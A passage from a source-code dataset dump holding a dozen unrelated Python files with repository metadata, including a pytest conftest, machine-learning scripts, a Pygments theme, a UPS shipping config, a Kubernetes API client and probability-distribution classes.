from nixio.test.xcompat.compile import maketests

BINDIR = tempfile.mkdtemp(prefix="nixpy-tests-")

def pytest_addoption(parser):
    parser.addoption("--nix-compat", action="store_true", default=False,
                     help=("Run nix compatibility tests "
                           "(requires NIX library)"))

@pytest.fixture
def bindir(request):
    return BINDIR

def pytest_collection_modifyitems(config, items):
    if config.getoption("--nix-compat"):
        print("Compiling NIX compatibility tests")
        maketests(BINDIR)
        return
    skip_compat = pytest.mark.skip(
        reason="Use --nix-compat option to run compatibility tests"
    )
    for item in items:
        if "compatibility" in item.keywords:
            item.add_marker(skip_compat)
```
| ["[email protected]"] | |
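A test that this conftest would skip without `--nix-compat` might look like the following sketch (test name and body are illustrative; all that matters is that `compatibility` appears in the item's keywords):

```python
import os
import pytest

@pytest.mark.compatibility  # matched by `"compatibility" in item.keywords` above
def test_compiled_fixtures_exist(bindir):
    # Hypothetical check; real tests would exercise the compiled NIX binaries.
    assert os.path.isdir(bindir)
```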
6a337ebcad790f7341970c4a3e71d1686f6229c6 | 333b405c1775475ddfa9ed3f4fa05c06b4c2e3f2 | /cv2/cvbackup/mycv_0.510464.py | c1b80110eb76fc4413a5cbbc9977af4cd86de47d | [] | no_license | daxiongshu/network | b77d5bb73dd353537f7687e61855d982cbd34464 | 842a778d310410ae39e58925257a9e9960ef560a | refs/heads/master | 2020-04-15T16:11:31.101188 | 2016-02-16T01:32:21 | 2016-02-16T01:32:21 | 51,798,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,405 | py |
```python
from xgb_classifier import xgb_classifier
import pandas as pd
import numpy as np
import pickle
from sklearn.ensemble import AdaBoostClassifier,ExtraTreesClassifier,RandomForestRegressor
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import roc_auc_score, f1_score, log_loss, make_scorer
from sklearn.linear_model import SGDClassifier
from sklearn.svm import LinearSVC,SVC
from sklearn.cross_validation import cross_val_score, train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.cross_validation import train_test_split,KFold,StratifiedKFold
from math import log, exp, sqrt,factorial
import numpy as np
from scipy import sparse
from sklearn.ensemble import RandomForestRegressor
from sklearn.externals.joblib import Memory
from sklearn.datasets import load_svmlight_file

def rmsle(y,yp):
    return (np.mean((yp-y)**2))**0.5

def multiclass_log_loss(y_true, y_pred, eps=1e-15):
    predictions = np.clip(y_pred, eps, 1 - eps)
    # normalize row sums to 1
    predictions /= predictions.sum(axis=1)[:, np.newaxis]
    actual = np.zeros(y_pred.shape)
    n_samples = actual.shape[0]
    #y_true-=1
    actual[np.arange(n_samples), y_true.astype(int)] = 1
    vectsum = np.sum(actual * np.log(predictions))
    loss = -1.0 / n_samples * vectsum
    return loss

def new_clf_train_predict(X,y,Xt):
    clf=single_model()
    clf.fit(X,y)
    return clf.predict_proba(Xt)

def cut(yp):
    yp[yp<0]=0
    yp[yp>7]=7
    yp=yp.astype(int)
    return yp

def kfold_cv(X_train, y_train,k):
    kf = StratifiedKFold(y_train,n_folds=k)
    xx=[]
    zz=[]
    ypred=np.zeros((y_train.shape[0],3))
    for train_index, test_index in kf:
        X_train_cv, X_test_cv = X_train[train_index,:],X_train[test_index,:]
        y_train_cv, y_test_cv = y_train[train_index],y_train[test_index]
        clf=xgb_classifier(eta=0.1,gamma=0,col=0.4,min_child_weight=1,depth=7,num_round=160)
        y_pred=clf.multi(X_train_cv,y_train_cv,X_test_cv,3,y_test=y_test_cv)
        xx.append(multiclass_log_loss(y_test_cv,y_pred))
        print xx[-1]#,y_pred.shape,zz[-1]
        ypred[test_index]=y_pred
    print xx
    print 'average:',np.mean(xx),'std',np.std(xx)
    return ypred,np.mean(xx)

mem = Memory("./mycache")

@mem.cache
def get_data(name):
    data = load_svmlight_file(name)
    return data[0], data[1]

X, _ = get_data('../sparse/rebuild1.svm')
X1, _ = get_data('../sparse/rebuild2.svm')
X2, _ = get_data('../sparse/rebuild3.svm')
X3, _ = get_data('../sparse/rebuild4.svm')
X4, _ = get_data('../sparse/rebuild5.svm')
X5, _ = get_data('../sparse/rebuild6.svm')

xx=[]
xx.append(np.sum(X.todense(),axis=1))
xx.append(np.sum(X1.todense(),axis=1))
xx.append(np.sum(X2.todense(),axis=1))
xx.append(np.sum(X3.todense(),axis=1))
xx.append(np.sum(X4.todense(),axis=1))
xx.append(np.std(X.todense(),axis=1))
xx.append(np.std(X1.todense(),axis=1))
xx.append(np.std(X2.todense(),axis=1))
xx.append(np.std(X3.todense(),axis=1))
xx.append(np.std(X4.todense(),axis=1))
#xx.append(np.sum(sparse.hstack([X,X1,X2,X3,X4],format='csr').todense(),axis=1))
#xx.append(np.max(X.todense(),axis=1)-np.min(X.todense(),axis=1))
#xx.append(np.max(X1.todense(),axis=1)-np.min(X1.todense(),axis=1))
#xx.append(np.max(X2.todense(),axis=1)-np.min(X2.todense(),axis=1))
#xx.append(np.max(X3.todense(),axis=1)-np.min(X3.todense(),axis=1))
#xx.append(np.max(X4.todense(),axis=1)-np.min(X4.todense(),axis=1))
xx=np.hstack(xx)

X=sparse.hstack([X,X1,X2,X3,X4,xx,pickle.load(open('../explore/X2.p'))],format='csr').todense()
train=pd.read_csv('../explore/train1.csv')
idname='id'
label='fault_severity'
idx=train[idname].as_matrix()
y=np.array(train[label])
import pickle
X=np.hstack([X,train.drop([label,idname],axis=1).as_matrix()])
#X=np.hstack([X,train[['location','volume']].as_matrix()])
print X.shape, y.shape

from scipy.stats import pearsonr
xx=[]
for i in X.T:
    score=pearsonr(np.array(i.T).ravel(),y)[0]
    if np.abs(score)>1e-2:
        xx.append(np.array(i.T).ravel())
X=np.array(xx).T
print X.shape, y.shape

yp,score=kfold_cv(X,y,4)
print X.shape, y.shape
print yp.shape
s=pd.DataFrame({idname:idx,'predict_0':yp[:,0],'predict_1':yp[:,1],'predict_2':yp[:,2],'real':y})
s.to_csv('va.csv',index=False)

import subprocess
cmd='cp mycv.py cvbackup/mycv_%f.py'%(score)
subprocess.call(cmd,shell=True)
cmd='cp va.csv cvbackup/va_%f.csv'%(score)
subprocess.call(cmd,shell=True)
```
| ["[email protected]"] | |
d39dbb85f0ea8a843010ed2ff417e14430ec8b04 | ae381913c23385f004b82161624097645ba8c4c8 | /Huaxian_eemd/projects/plot_decompositions.py | 8dbd45db6556f91e1ce3f8e7adbb1107c6385152 | ["MIT"] | permissive | zjy8006/MonthlyRunoffForecastByAutoReg | aa37910fdc66276d0df9d30af6885209d4a4ebfc | 661fcb5dcdfbbb2ec6861e1668a035b50e69f7c2 | refs/heads/master | 2020-12-12T05:25:48.768993 | 2020-08-20T07:21:12 | 2020-08-20T07:21:12 | 259,588,564 | 7 | 3 | null | null | null | null | UTF-8 | Python | false | false | 271 | py |
```python
import pandas as pd
import os
root_path = os.path.dirname(os.path.abspath('__file__'))
import sys
sys.path.append(root_path)
from tools.plot_utils import plot_decompositions

signal = pd.read_csv(root_path+'/Huaxian_eemd/data/EEMD_TRAIN.csv')
plot_decompositions(signal)
```
| ["[email protected]"] | |
613939625c016e2ed72cd4b6885baa6b413b8c7e | 5946112229fe1d9a04b7536f076a656438fcd05b | /dev_env/lib/python3.8/site-packages/pygments/styles/rrt.py | 2b1908794c8703c74074b3c356e1d1022988809b | [] | no_license | Gear-Droid/openCV_study_project | 3b117967eb8a28bb0c90088e1556fbc1d306a98b | 28c9a494680c4a280f87dd0cc87675dfb2262176 | refs/heads/main | 2023-05-14T14:27:42.284265 | 2021-06-05T00:16:09 | 2021-06-05T00:16:09 | 307,807,458 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 885 | py |
```python
# -*- coding: utf-8 -*-
"""
    pygments.styles.rrt
    ~~~~~~~~~~~~~~~~~~~

    pygments "rrt" theme, based on Zap and Emacs defaults.

    :copyright: Copyright 2006-2020 by the Pygments team, see AUTHORS.
    :license: BSD, see LICENSE for details.
"""

from pygments.style import Style
from pygments.token import Comment, Name, Keyword, String


class RrtStyle(Style):
    """
    Minimalistic "rrt" theme, based on Zap and Emacs defaults.
    """

    background_color = '#000000'
    highlight_color = '#0000ff'

    styles = {
        Comment: '#00ff00',
        Name.Function: '#ffff00',
        Name.Variable: '#eedd82',
        Name.Constant: '#7fffd4',
        Keyword: '#ff0000',
        Comment.Preproc: '#e5e5e5',
        String: '#87ceeb',
        Keyword.Type: '#ee82ee',
    }
```
| ["[email protected]"] | |
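A quick sketch of applying the style through Pygments' standard highlight API (any recent Pygments accepts a style class this way):

```python
from pygments import highlight
from pygments.lexers import PythonLexer
from pygments.formatters import HtmlFormatter
from pygments.styles.rrt import RrtStyle

code = "def f(x):\n    return x + 1\n"
html = highlight(code, PythonLexer(), HtmlFormatter(style=RrtStyle))
print(html[:30])  # '<div class="highlight">...'
```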
1400cc7e36dc1608eda6cf944b667fb37a1ea0b3 | b19dfd6a3ba5d107d110fb936de2e91d1d92bb99 | /venv/lib/python3.7/site-packages/Satchmo-0.9.3-py3.7.egg/shipping/modules/ups/config.py | 5c8e90a363eefc21999a9a0da571173a720a91b8 | [] | no_license | siddhant3030/djangoecommerce | d8f5b21f29d17d2979b073fd9389badafc993b5c | b067cb1155c778fece4634d0a98631a0646dacff | refs/heads/master | 2022-12-13T15:28:39.229377 | 2019-09-28T10:30:02 | 2019-09-28T10:30:02 | 207,240,716 | 2 | 1 | null | 2022-12-11T01:34:25 | 2019-09-09T06:35:36 | Python | UTF-8 | Python | false | false | 3,913 | py |
```python
from decimal import Decimal
from django.utils.translation import ugettext_lazy as _
from livesettings.values import StringValue, ConfigurationGroup, BooleanValue, DecimalValue, MultipleStringValue
from livesettings.functions import config_register_list, config_get

SHIP_MODULES = config_get('SHIPPING', 'MODULES')
SHIP_MODULES.add_choice(('shipping.modules.ups', 'UPS'))

SHIPPING_GROUP = ConfigurationGroup('shipping.modules.ups',
                                    _('UPS Shipping Settings'),
                                    requires=SHIP_MODULES,
                                    ordering=101)

config_register_list(
    StringValue(SHIPPING_GROUP,
                'XML_KEY',
                description=_("UPS XML Access Key"),
                help_text=_("XML Access Key Provided by UPS"),
                default=""),
    StringValue(SHIPPING_GROUP,
                'USER_ID',
                description=_("UPS User ID"),
                help_text=_("User ID provided by UPS site."),
                default=""),
    StringValue(SHIPPING_GROUP,
                'ACCOUNT',
                description=_("UPS Account Number"),
                help_text=_("UPS Account Number."),
                default=""),
    StringValue(SHIPPING_GROUP,
                'USER_PASSWORD',
                description=_("UPS User Password"),
                help_text=_("User password provided by UPS site."),
                default=""),
    MultipleStringValue(SHIPPING_GROUP,
                        'UPS_SHIPPING_CHOICES',
                        description=_("UPS Shipping Choices Available to customers. These are valid domestic codes only."),
                        choices=(
                            (('01', 'Next Day Air')),
                            (('02', 'Second Day Air')),
                            (('03', 'Ground')),
                            (('12', '3 Day Select')),
                            (('13', 'Next Day Air Saver')),
                            (('14', 'Next Day Air Early AM')),
                            (('59', '2nd Day Air AM')),
                        ),
                        default=('03',)),
    DecimalValue(SHIPPING_GROUP,
                 'HANDLING_FEE',
                 description=_("Handling Fee"),
                 help_text=_("The cost of packaging and getting the package off"),
                 default=Decimal('0.00')),
    StringValue(SHIPPING_GROUP,
                'SHIPPING_CONTAINER',
                description=_("Type of container used to ship product."),
                choices=(
                    (('00', 'Unknown')),
                    (('01', 'UPS LETTER')),
                    (('02', 'PACKAGE / CUSTOMER SUPPLIED')),
                ),
                default="00"),
    BooleanValue(SHIPPING_GROUP,
                 'SINGLE_BOX',
                 description=_("Single Box?"),
                 help_text=_("Use just one box and ship by weight? If no then every item will be sent in its own box."),
                 default=True),
    BooleanValue(SHIPPING_GROUP,
                 'TIME_IN_TRANSIT',
                 description=_("Time in Transit?"),
                 help_text=_("Use the UPS Time In Transit API? It is slower but delivery dates are more accurate."),
                 default=False),
    StringValue(SHIPPING_GROUP,
                'PICKUP_TYPE',
                description=_("UPS Pickup option."),
                choices=(
                    (('01', 'DAILY PICKUP')),
                    (('03', 'CUSTOMER COUNTER')),
                    (('06', 'ONE TIME PICKUP')),
                    (('07', 'ON CALL PICKUP')),
                ),
                default="07"),
    BooleanValue(SHIPPING_GROUP,
                 'LIVE',
                 description=_("Access production UPS server"),
                 help_text=_("Use this when your store is in production."),
                 default=False),
    StringValue(SHIPPING_GROUP,
                'CONNECTION',
                description=_("Submit to URL"),
                help_text=_("Address to submit live transactions."),
                default="https://onlinetools.ups.com/ups.app/xml/Rate"),
    StringValue(SHIPPING_GROUP,
                'CONNECTION_TEST',
                description=_("Submit to TestURL"),
                help_text=_("Address to submit test transactions."),
                default="https://wwwcie.ups.com/ups.app/xml/Rate"),
    BooleanValue(SHIPPING_GROUP,
                 'VERBOSE_LOG',
                 description=_("Verbose logs"),
                 help_text=_("Send the entire request and response to the log - for debugging help when setting up UPS."),
                 default=False)
)
```
| ["[email protected]"] | |
4da4aa68a0cd83d1a57b20435439e06bad9395a2 | fc6f709f916fcd201938157990c77fa9202eefa7 | /model/optimizer.py | 4a9ee5afce8f27d52a2e33ea778b94ad326ffc29 | ["MIT"] | permissive | chenchy/StyleSpeech | 441ffd6d71ac0269d205ad66c9536fe00cb5267c | e0e4ad25681f9ecc2a01ba1b87cbe0c59472b792 | refs/heads/main | 2023-05-27T21:39:04.790584 | 2021-06-13T10:32:03 | 2021-06-13T11:26:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,650 | py |
```python
import torch
import numpy as np


class ScheduledOptimMain:
    """ A simple wrapper class for learning rate scheduling """

    def __init__(self, model, train_config, model_config, current_step):
        self._optimizer = torch.optim.Adam(
            model.parameters(),
            betas=train_config["optimizer"]["betas"],
            eps=train_config["optimizer"]["eps"],
            weight_decay=train_config["optimizer"]["weight_decay"],
        )
        self.n_warmup_steps = train_config["optimizer"]["warm_up_step"]
        self.anneal_steps = train_config["optimizer"]["anneal_steps"]
        self.anneal_rate = train_config["optimizer"]["anneal_rate"]
        self.current_step = current_step
        self.init_lr = np.power(model_config["transformer"]["encoder_hidden"], -0.5)

    def step_and_update_lr(self):
        self._update_learning_rate()
        self._optimizer.step()

    def zero_grad(self):
        # print(self.init_lr)
        self._optimizer.zero_grad()

    def load_state_dict(self, path):
        self._optimizer.load_state_dict(path)

    def _get_lr_scale(self):
        lr = np.min(
            [
                np.power(self.current_step, -0.5),
                np.power(self.n_warmup_steps, -1.5) * self.current_step,
            ]
        )
        for s in self.anneal_steps:
            if self.current_step > s:
                lr = lr * self.anneal_rate
        return lr

    def _update_learning_rate(self):
        """ Learning rate scheduling per step """
        self.current_step += 1
        lr = self.init_lr * self._get_lr_scale()
        for param_group in self._optimizer.param_groups:
            param_group["lr"] = lr


class ScheduledOptimDisc:
    """ A simple wrapper class for learning rate scheduling """

    def __init__(self, model, train_config):
        self._optimizer = torch.optim.Adam(
            model.parameters(),
            betas=train_config["optimizer"]["betas"],
            eps=train_config["optimizer"]["eps"],
            weight_decay=train_config["optimizer"]["weight_decay"],
        )
        self.init_lr = train_config["optimizer"]["lr_disc"]
        self._init_learning_rate()

    def step_and_update_lr(self):
        self._optimizer.step()

    def zero_grad(self):
        # print(self.init_lr)
        self._optimizer.zero_grad()

    def load_state_dict(self, path):
        self._optimizer.load_state_dict(path)

    def _init_learning_rate(self):
        lr = self.init_lr
        for param_group in self._optimizer.param_groups:
            param_group["lr"] = lr
```
| ["[email protected]"] | |
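In `_get_lr_scale` above, with d the encoder hidden size, w the warm-up step count, r the anneal rate, and t the current step, the scheduled learning rate is the Transformer ("Noam") warmup schedule with added step annealing:

$$
\mathrm{lr}(t) = d^{-1/2} \cdot \min\!\left(t^{-1/2},\; t \cdot w^{-3/2}\right) \cdot r^{\,\left|\{s \in \text{anneal\_steps} \,:\, t > s\}\right|}
$$

The rate grows linearly until t = w, then decays like t^{-1/2}, and each crossed anneal step multiplies it by r once.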
5b8aced9977d9f12adf0d4b703c3e25b1e55c899 | e16911f1fae7bf90f405e055e0f90731ae8c8042 | /etc/st2packgen/files/actions/lib/k8sbase.py | 89df63259b4fbf47136ae2a8cdf29077dfb9461e | [] | no_license | bobhenkel/stackstorm-kubernetes | 87136448434b1a6c821cfeb757f88833ca8ecf02 | 32b8538597bc5290a18cefadbf98fea7f8bb38bd | refs/heads/master | 2021-04-25T22:06:36.392650 | 2017-11-02T04:30:02 | 2017-11-02T04:30:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,242 | py |
```python
from __future__ import absolute_import
from pyswagger.core import BaseClient
from requests import Session, Request
import six
import json
import base64


class Client(BaseClient):

    # declare supported schemes here
    __schemes__ = set(['http', 'https'])

    def __init__(self, config=None, auth=None, send_opt=None, extraheaders=None):
        """ constructor

        :param auth pyswagger.SwaggerAuth: auth info used when requesting
        :param send_opt dict: options used in requests.send, ex verify=False
        """
        super(Client, self).__init__(auth)
        if send_opt is None:
            send_opt = {}
        self.__s = Session()
        self.__send_opt = send_opt
        self.extraheaders = extraheaders
        auth = base64.b64encode(config['user'] + ":" + config['password'])
        self.authhead = {"authorization": "Basic " + auth}

    def request(self, req_and_resp, opt):
        # passing to parent for default patching behavior,
        # applying authorizations, ...etc.
        req, resp = super(Client, self).request(req_and_resp, opt)

        req.prepare(scheme=self.prepare_schemes(req).pop(), handle_files=False)
        req._patch(opt)

        file_obj = []

        def append(name, obj):
            f = obj.data or open(obj.filename, 'rb')
            if 'Content-Type' in obj.header:
                file_obj.append((name, (obj.filename, f, obj.header['Content-Type'])))
            else:
                file_obj.append((name, (obj.filename, f)))

        for k, v in six.iteritems(req.files):
            if isinstance(v, list):
                for vv in v:
                    append(k, vv)
            else:
                append(k, v)

        rq = Request(
            method=req.method.upper(),
            url=req.url,
            params=req.query,
            data=req.data,
            headers=req.header,
            files=file_obj
        )
        rq = self.__s.prepare_request(rq)
        rq.headers.update(self.authhead)
        rs = self.__s.send(rq, stream=True, **self.__send_opt)

        myresp = {}
        myresp['status'] = rs.status_code
        myresp['data'] = json.loads(rs.content.rstrip())
        # myresp['headers'] = rs.headers
        return myresp
```
| ["[email protected]"] | |
c06bcf0c5bf8278caf07c0496ba1c817c184ba8d | 3d2e5d1092acccfb73c07d68b6beeffc44b3f776 | /imitation/src/environments/simulation/pybullet_env.py | 10ef9e12e56c2333e0813282dd5bdfe598ed1611 | [] | no_license | MatthijsBiondina/WorldModels | f6cbcfe5349da7119329ef10831810d1b85c9d02 | ab468f1aa978e3aa4e05174db24922085d1e33b1 | refs/heads/master | 2022-12-22T11:54:46.040828 | 2020-09-23T11:41:48 | 2020-09-23T11:41:48 | 248,212,491 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,560 | py |
```python
import gym
import pybulletgym
import numpy as np

from src.environments.general.environment_template import Environment
from src.utils import config as cfg

_ = pybulletgym

PREP_VECTORS = {'InvertedPendulumSwingupPyBulletEnv-v0': np.array([1, 0.2, 1, 1, 0.067], dtype=np.float16)}


def preprocess_observation(obs):
    """
    :param obs: unprocessed observation
    :return: normalized observation
    """
    return np.clip(obs * PREP_VECTORS[cfg.env_name], -1., 1.)


class SimEnv(Environment):
    def __init__(self, save_loc: str):
        super().__init__(save_loc)
        self.env = gym.make(cfg.env_name)
        self.t = 0
        self.actions = [np.zeros(self.action_size)] * cfg.latency

    def reset(self):
        """
        Reset environment

        :return: observation at t=0
        """
        self.t = 0
        self.actions = [np.zeros(self.action_size)] * cfg.latency
        return preprocess_observation(self.env.reset())

    def step(self, action: np.ndarray):
        """
        Perform action and observe next state. Action is repeated 'action_repeat' times.

        :param action: the action to take
        :return: next observation, reward, terminal state
        """
        obs, done = None, None
        reward = 0
        self.actions.append(action)
        for k in range(cfg.action_repeat):
            obs, reward_k, done, _ = self.env.step(self.actions[0])
            reward += reward_k
            done = done or self.t == cfg.max_episode_length
            if done:
                break
        self.actions.pop(0)
        return preprocess_observation(obs), reward, done

    def render(self) -> np.ndarray:
        """
        Renders the environment to RGB array

        :return: frame capture of environment
        """
        return self.env.render(mode='rgb_array')

    def close(self):
        """
        Cleanup

        :return: n/a
        """
        self.env.close()

    def sample_random_action(self) -> np.ndarray:
        """
        Sample an action randomly from a uniform distribution over all valid actions

        :return: random action
        """
        return self.env.action_space.sample()

    @property
    def obs_size(self) -> int:
        """
        GETTER METHOD

        :return: size of observations in this environment
        """
        return self.env.observation_space.shape[0]

    @property
    def action_size(self):
        """
        GETTER METHOD

        :return: size of actions in this environment
        """
        return self.env.action_space.shape[0]
```
| ["[email protected]"] | |
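A hypothetical smoke-test loop for `SimEnv` (the `save_loc` value is made up, and `cfg` must already define `env_name`, `latency`, `action_repeat`, and `max_episode_length`):

```python
# Sketch only: assumes cfg is configured before SimEnv is constructed.
env = SimEnv(save_loc="/tmp/worldmodels")
obs = env.reset()
done, total = False, 0.0
while not done:
    action = env.sample_random_action()
    obs, reward, done = env.step(action)   # action is delayed cfg.latency steps
    total += reward
env.close()
print("episode return:", total)
```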
c8a58abf83afbf6366b65b7dc1ee8f6a5d6ef831 | 24ffbd64e1892ab633ca785e969ccef43f17a9f2 | /picomotor/devices/h2_yr.py | efa1098cd7f197e7875e4fee3720cf40bfa6fb58 | [] | no_license | yesrgang/labrad_tools.srq | e29fcbfc4f5228955de1faddab6a66df52ccdd03 | 0dfbf2609d2f7a7e499167decedb0d9ea3677978 | refs/heads/master | 2021-06-18T19:59:21.448762 | 2021-02-04T22:03:49 | 2021-02-04T22:03:49 | 155,478,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py |
```python
from picomotor.devices.nf8742.device import NF8742

class Motor(NF8742):
    socket_address = ('192.168.1.20', 23)
    controller_axis = 4

Device = Motor
```
| ["[email protected]"] | |
092db6afd0b046dcf1485a91be052fd57d5c502e | a177931c2914cc9820c578add9d57aa6c75084ce | /tips/customHTML/test_genTABHTML.py | cfd92464403354ae73e44a3df5bc666a81d2eb93 | [] | no_license | zhangshoug/others | 45d94f96701362cb077eb994c27295247a6fb712 | 3a8a8366f2598a5e88b44d18d346e81f4eef659e | refs/heads/master | 2022-12-18T22:37:13.505543 | 2020-09-28T08:54:28 | 2020-09-28T08:54:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,021 | py |
```python
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name:    test_genTABHTML
Description : tab css style test
Author :      pchaos
date:         2019/9/9
-------------------------------------------------
Change Activity:
    2019/9/9:
-------------------------------------------------
"""
import unittest
from unittest import TestCase
from .genTabHTML import genTABHTML


class TestGenTABHTML(TestCase):
    def test_genHTML(self):
        # List of output filenames. The template file is template.html; each
        # template data file is named <output filename> + ".ini".
        flist = ["main.htm", "main_tech.htm", "hacker.html"]
        # inifile = '{}.ini'.format(flist[0])
        renderList = []
        for fn in flist:
            inifile = '{}.ini'.format(fn)
            gh = genTABHTML()
            # gh.outputFilename = fn
            gh.outputFilename = "test"
            gh.iniFilename = inifile
            try:
                templateFile = "customHTML/template.tab.table.html"
                of, render = gh.genHTML(None,
                                        # of, render = gh.genHTML("a{}".format(fn),
                                        title=fn.split(".")[0],
                                        prettify=False,
                                        template=templateFile)
            except Exception as e:
                templateFile = "template.tab.table.html"
                of, render = gh.genHTML(None,
                                        # of, render = gh.genHTML("a{}".format(fn),
                                        title=fn.split(".")[0],
                                        prettify=False,
                                        template=templateFile)
            print("Output file written: {}".format(of))
            # print(render)
            self.assertTrue(len(render) > 100)
            renderList.append(render)
        print(renderList)

        # main
        inifile = '{}.ini'.format(flist[0])
        gh = genTABHTML()
        # gh.outputFilename = fn
        gh.iniFilename = inifile
        try:
            templateFile = "template.tab.html"
            render = gh.renders(renderList,
                                prettify=True,
                                # template="customHTML/template.tab.html",
                                template=templateFile,
                                title="Main")
        except Exception as e:
            templateFile = "customHTML/template.tab.html"
            render = gh.renders(renderList,
                                prettify=True,
                                # template="customHTML/template.tab.html",
                                template=templateFile,
                                title="Main")
        saveText = ""
        for r in render:
            saveText += r
        gh.save('main.htm', saveText)
        print("Output file written: {}".format(render))


if __name__ == '__main__':
    unittest.main()
```
| ["[email protected]"] | |
6b7ec47b7dfaed08aeefb1d1ec11acaff71addf7 | 447e9ec821dc7505cc9b73fb7abeb220fe2b3a86 | /rvpy/logistic.py | 2d66e011e93fb9f8e4dc0e7ab086276b4445ba04 | ["MIT"] | permissive | timbook/rvpy | ecd574f91ed50fd47b6ead8517954f01e33c03a7 | 301fd61df894d4b300176e287bf9e725378c38eb | refs/heads/master | 2020-03-19T04:01:49.283213 | 2018-12-18T19:21:07 | 2018-12-18T19:21:07 | 135,788,512 | 1 | 0 | MIT | 2018-12-18T19:21:08 | 2018-06-02T04:55:39 | Python | UTF-8 | Python | false | false | 3,722 | py |
```python
import numpy as np
from math import log, exp
from scipy.stats import logistic, fisk
from . import distribution


class Logistic(distribution.Distribution):
    """
    Logistic Distribution using the following parameterization:

        f(x | loc, scale) = exp(-z) / (s * (1 + exp(-z))^2)

    where z = (x - loc) / scale

    Parameters
    ----------
    loc : float, positive
        Location parameter
    scale : float, positive
        Scale parameter

    Methods
    -------
    exp()
        Transforms self to LogLogistic

    Relationships
    -------------
    Let X be Logistic, a, b float. Then:
    * aX + b is Logistic
    * exp(X) is Log-Logistic
    """
    def __init__(self, loc=0, scale=1):
        """
        Parameters
        ----------
        loc : float, positive
            Location parameter
        scale : float, positive
            Scale parameter
        """
        assert scale > 0, "scale parameter must be positive"

        # Parameters
        self.loc = loc
        self.scale = scale

        # Scipy backend
        self.sp = logistic(loc=loc, scale=scale)

        super().__init__()

    def __repr__(self):
        return f"Logistic(loc={self.loc}, scale={self.scale})"

    def __add__(self, other):
        if isinstance(other, (int, float)):
            return Logistic(self.loc + other, self.scale)
        else:
            raise TypeError(f"Can't add or subtract objects of type {type(other)} to Logistic")

    def __mul__(self, other):
        if isinstance(other, (int, float)):
            return Logistic(other * self.loc, other * self.scale)
        else:
            raise TypeError(f"Can't multiply objects of type {type(other)} by Logistic")

    def __truediv__(self, other):
        if isinstance(other, (int, float)):
            return self.__mul__(1/other)
        else:
            raise TypeError(f"Can't divide objects of type {type(other)} by Logistic")

    def exp(self):
        return LogLogistic(alpha=exp(self.loc), beta=1/self.scale)

    # TODO: Gumbel - Gumbel = Logistic


class LogLogistic(distribution.Distribution):
    """
    LogLogistic Distribution using the following parameterization:

        f(x | a, b) = (b/a) * (x/a)^(b-1) / (1 + (x/a)^b)^2

    Parameters
    ----------
    alpha : float, positive
        Scale parameter
    beta : float, positive
        Shape parameter

    Methods
    -------
    log()
        Transforms self to Logistic

    Relationships
    -------------
    Let X be LogLogistic, k > 0 float. Then:
    * kX is LogLogistic
    * log(X) is Logistic
    """
    def __init__(self, alpha, beta):
        """
        Parameters
        ----------
        alpha : float, positive
            Scale parameter
        beta : float, positive
            Shape parameter
        """
        assert alpha > 0, "alpha must be positive"
        assert beta > 0, "beta must be positive"

        # Parameters
        self.alpha = alpha
        self.beta = beta

        # Scipy backend
        self.sp = fisk(c=beta, scale=alpha)

        super().__init__()

    def __repr__(self):
        return f"LogLogistic(alpha={self.alpha}, beta={self.beta})"

    def __mul__(self, other):
        if isinstance(other, (int, float)):
            return LogLogistic(other*self.alpha, self.beta)
        else:
            raise TypeError(f"Can't multiply objects of type {type(other)} by LogLogistic")

    def __truediv__(self, other):
        if isinstance(other, (int, float)):
            return self.__mul__(1/other)
        else:
            raise TypeError(f"Can't divide objects of type {type(other)} by LogLogistic")

    def log(self):
        return Logistic(loc=np.log(self.alpha), scale=1/self.beta)
```
| ["[email protected]"] | |
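A sketch exercising the exp/log relationship the docstrings describe (it assumes the package exports `Logistic` at the top level, which is not shown in this file):

```python
from rvpy import Logistic  # assumed top-level export

X = Logistic(loc=2.0, scale=0.5)
Y = X.exp()    # LogLogistic(alpha=e^2 ≈ 7.389, beta=1/0.5 = 2.0)
Z = Y.log()    # round-trips to Logistic(loc=2.0, scale=0.5)
print(X, Y, Z, sep="\n")
```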
df016bf13355458c6083ae6c2005a1cebd3ceecb | 7b6313d1c4e0e8a5bf34fc8ac163ad446bc69354 | /datastructure and algorithms/[hackerrank]The Hurdle Race.py | 5bcab2ab43d0415da1bf267cba2ff15bee29380b | [] | no_license | menuka-maharjan/competitive_programming | c6032ae3ddcbc974e0e62744989a2aefa30864b2 | 22d0cea0f96d8bd6dc4d81b146ba20ea627022dd | refs/heads/master | 2023-05-01T05:23:09.641733 | 2021-05-23T16:22:21 | 2021-05-23T16:22:21 | 332,250,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py |
```python
nk = input().split()
n = int(nk[0])
k = int(nk[1])
l = list(map(int, input().rstrip().split()))
x = max(l)
if (x - k) >= 0:
    print(x - k)
else:
    print(0)
```
| ["[email protected]"] | |
85596fb3ff870c316d4d7b3553f515d5d673f9b9 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2007/desktop/kde/autostart/actions.py | 5bd7b2827ebfb6bdfc4093743e2fb7ed2daacc96 | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py |
```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.

from pisi.actionsapi import kde

def setup():
    kde.configure()

def build():
    kde.make()

def install():
    kde.install()
```
| ["[email protected]"] | |
